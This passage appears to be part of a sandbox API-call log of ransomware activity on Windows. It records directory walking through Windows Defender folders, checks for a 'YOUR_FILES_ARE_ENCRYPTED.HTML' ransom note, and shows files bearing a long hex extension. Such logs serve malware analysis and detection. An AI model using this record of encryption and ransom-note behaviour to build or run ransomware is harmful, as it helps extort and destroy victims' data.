lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy" [0110.238] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*" [0110.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1b8a13, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.238] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1b8a13, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.238] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1b8a13, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1b8a13, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1bdb5a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.238] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1b8a13, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1b8a13, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1bdb5a, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.238] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.239] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 89 [0110.239] GetProcessHeap () returned 0x600000 [0110.239] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.239] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\LocalCopy\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\localcopy\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.239] GetProcessHeap () returned 0x600000 [0110.239] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.239] GetProcessHeap () returned 0x600000 [0110.239] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.239] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd525f5, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Network Inspection System", cAlternateFileName="NETWOR~1")) returned 1 [0110.239] StrStrIW (lpFirst="Network Inspection System", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.239] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System") returned 75 [0110.240] GetProcessHeap () returned 0x600000 [0110.240] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.240] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System" [0110.240] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\*" [0110.240] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1dd3f4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.240] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd525f5, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1dd3f4, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.241] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf203143, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf203143, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="Support", cAlternateFileName="")) returned 1 [0110.241] StrStrIW (lpFirst="Support", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.241] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support") returned 83 [0110.241] GetProcessHeap () returned 0x600000 [0110.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.242] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support" [0110.242] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\*" [0110.242] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf203143, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf203143, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.242] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd525f5, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf203143, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf203143, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x632a08, dwReserved1=0x6363f8, cFileName="..", cAlternateFileName="")) returned 1 [0110.242] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf926e663, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf926e663, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf209309, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x64b7, dwReserved0=0x632a08, dwReserved1=0x6363f8, cFileName="NisLog.txt.B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E", cAlternateFileName="NISLOG~1.B82")) returned 1 [0110.242] StrStrIW (lpFirst="NisLog.txt.B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.242] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\NisLog.txt.B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E") returned 159 [0110.242] PathFindExtensionW (pszPath="NisLog.txt.B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E") returned=".B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E" [0110.242] lstrlenW (lpString=".B824A17CCB8B0CC3265C20D409EAD7097419D22024A6ADA953CE59E748DD614E") returned 65 [0110.242] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1d4bb7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1d4bb7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1d85a9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x632a08, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.242] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1d4bb7, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1d4bb7, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1d85a9, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x632a08, dwReserved1=0x6363f8, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.242] FindClose (in: hFindFile=0x626bb8 | out: hFindFile=0x626bb8) returned 1 [0110.242] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0110.242] GetProcessHeap () returned 0x600000 [0110.242] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\Support\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\network inspection system\\support\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.242] GetProcessHeap () returned 0x600000 [0110.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.243] GetProcessHeap () returned 0x600000 [0110.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0110.243] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1dd3f4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1dd3f4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1e0eac, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.243] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1dd3f4, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1dd3f4, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1e0eac, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.243] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.244] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 105 [0110.244] GetProcessHeap () returned 0x600000 [0110.244] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Network Inspection System\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\network inspection system\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.244] GetProcessHeap () returned 0x600000 [0110.244] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.244] GetProcessHeap () returned 0x600000 [0110.244] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.245] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xd78854, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Quarantine", cAlternateFileName="QUARAN~1")) returned 1 [0110.245] StrStrIW (lpFirst="Quarantine", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.245] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned 60 [0110.245] GetProcessHeap () returned 0x600000 [0110.245] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.246] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine" [0110.246] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*" [0110.246] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1f46c5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0110.246] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xd78854, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xaf1f46c5, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.246] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1f46c5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1f46c5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1f8290, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0110.246] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf1f46c5, ftCreationTime.dwHighDateTime=0x1d7347a, ftLastAccessTime.dwLowDateTime=0xaf1f46c5, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf1f8290, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0110.246] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0110.246] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 90 [0110.246] GetProcessHeap () returned 0x600000 [0110.246] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3183de0 [0110.246] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Quarantine\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\windows defender\\quarantine\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0110.246] GetProcessHeap () returned 0x600000 [0110.246] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3183de0 | out: hHeap=0x600000) returned 1 [0110.247] GetProcessHeap () returned 0x600000 [0110.247] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3173dd8 | out: hHeap=0x600000) returned 1 [0110.247] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf5215ed, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf5215ed, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x623a08, dwReserved1=0x626bc0, cFileName="Scans", cAlternateFileName="")) returned 1 [0110.247] StrStrIW (lpFirst="Scans", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.247] wnsprintfW (in: pszDest=0x3163dd0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned 55 [0110.247] GetProcessHeap () returned 0x600000 [0110.247] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3173dd8 [0110.248] lstrcpyW (in: lpString1=0x3173dd8, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans" [0110.248] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*" [0110.248] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf5215ed, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf5215ed, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0110.248] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd78854, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xaf5215ed, ftLastAccessTime.dwHighDateTime=0x1d7347a, ftLastWriteTime.dwLowDateTime=0xaf5215ed, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="..", cAlternateFileName="")) returned 1 [0110.248] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xf913d3e5, ftLastWriteTime.dwHighDateTime=0x1d70067, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x636454, dwReserved1=0x6363f0, cFileName="CleanFileTelemetry", cAlternateFileName="CLEANF~1")) returned 1 [0110.248] StrStrIW (lpFirst="CleanFileTelemetry", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0110.248] wnsprintfW (in: pszDest=0x3173dd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry") returned 74 [0110.248] GetProcessHeap () returned 0x600000 [0110.248] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0110.250] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry" [0110.250] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\*" [0110.250] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Windows Defender\\Scans\\CleanFileTelemetry\\*", lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf913d3e5, ftCreationTime.dwHighDateTime=0x1d70067, ftLastAccessTime.dwLowDateTime=0xf913d3e5, ftLastAccessTime.dwHighDateTime=0x1d70067, ftLastWriteTime.dwLowDateTime=0xaf216a4f, ftLastWriteTime.dwHighDateTime=0x1d7347a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60f6e0, dwReserved1=0x6363f8, cFileName=".", cAlternateFileName="")) returned 0x626bb8 [0110.250] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19e4d8 | out: 